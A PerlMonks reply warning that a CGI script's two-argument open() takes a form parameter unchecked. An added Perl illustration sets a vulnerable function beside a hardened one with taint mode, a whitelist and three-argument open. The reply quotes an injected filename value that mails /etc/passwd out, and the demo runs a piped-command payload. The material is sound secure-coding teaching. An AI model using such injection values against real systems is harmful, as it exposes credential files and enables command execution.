PerlMonks
DANGER! by Fastolfe (Vicar)
on Jun 09, 2000 at 03:01 UTC [id://17243]
Please read the 'perlsec' man page. You are doing a very dangerous open() call, passing the argument from your HTML form 'name' parameter directly to open. Thus, I can pass an argument of "mail me@example.com </etc/passwd; cat whatever |" and no one would be the wiser. It's not hard to change this into something considerably more destructive. Please consider running CGI apps with the -T and -w flags, which would catch major security issues like this. The 'perlsec' man page gives more detail.
In Section: Seekers of Perl Wisdom
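Added illustration (not part of Fastolfe's reply or the original poster's script) of the two-argument open() problem the reply describes, beside a hardened version. The `name` value is a constructed stand-in for the form parameter, and the payload is a harmless `echo` rather than the `mail ... </etc/passwd` one in the reply; `unsafe_read`, `safe_read` and the temp-directory layout are this example's own inventions.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use File::Temp qw(tempdir);

# Constructed stand-in for the CGI 'name' parameter. In the real script it
# would come from the form (CGI->param('name')), and under -T it would be
# tainted. A harmless command is used here instead of the reply's payload.
my $name = "echo INJECTED |";

# Vulnerable pattern from the post: two-argument open. The *mode* is parsed
# out of the data, so a value ending in '|' is a piped open and Perl hands
# the rest to the shell. Under -T with a tainted $file, Perl instead dies
# with "Insecure dependency in piped open", which is the check the reply
# recommends turning on.
sub unsafe_read {
    my ($file) = @_;
    open(my $fh, $file) or return undef;   # mode is taken from $file itself
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Hardened version. Two changes: the name must match a whitelist (a word
# character followed by word characters, dots and dashes: no slashes, no
# leading dot, so no '..' and no absolute paths), which is also the idiom
# for untainting a value under -T; and open gets an explicit '<' mode as a
# separate argument, so nothing in the name can change what open does.
sub safe_read {
    my ($dir, $raw) = @_;
    my ($file) = $raw =~ /\A(\w[\w.-]*)\z/
        or die "refusing suspicious filename\n";
    open(my $fh, '<', "$dir/$file")
        or die "cannot open $dir/$file: $!\n";
    local $/;
    my $data = <$fh>;
    close $fh;
    return $data;
}

# The attack against the two-argument open: what comes back is not a file's
# contents but the output of the injected command.
my $got = unsafe_read($name);
print "unsafe_read returned: ", (defined $got ? $got : "(open failed)\n");

# The same payload against the hardened version is rejected before open()
# is ever reached.
my $dir = tempdir(CLEANUP => 1);
eval { safe_read($dir, $name) };
print "safe_read rejected it: $@";

# A legitimate name still works, restricted to the directory the program
# chose rather than wherever the form data points.
open(my $out, '>', "$dir/hello.txt") or die "cannot write: $!\n";
print $out "hello\n";
close $out;
print "safe_read(hello.txt): ", safe_read($dir, 'hello.txt');
```

Run it with `perl -T` and a real, tainted form value to see the difference taint mode makes: the two-argument open dies at the piped open rather than executing it, while the hardened path works because the regex capture is the documented way to launder the value. Note that the three-argument open and the whitelist are each necessary on their own: the explicit mode stops `|` and `>` from changing the operation, and the whitelist stops the user from naming a file outside the intended directory.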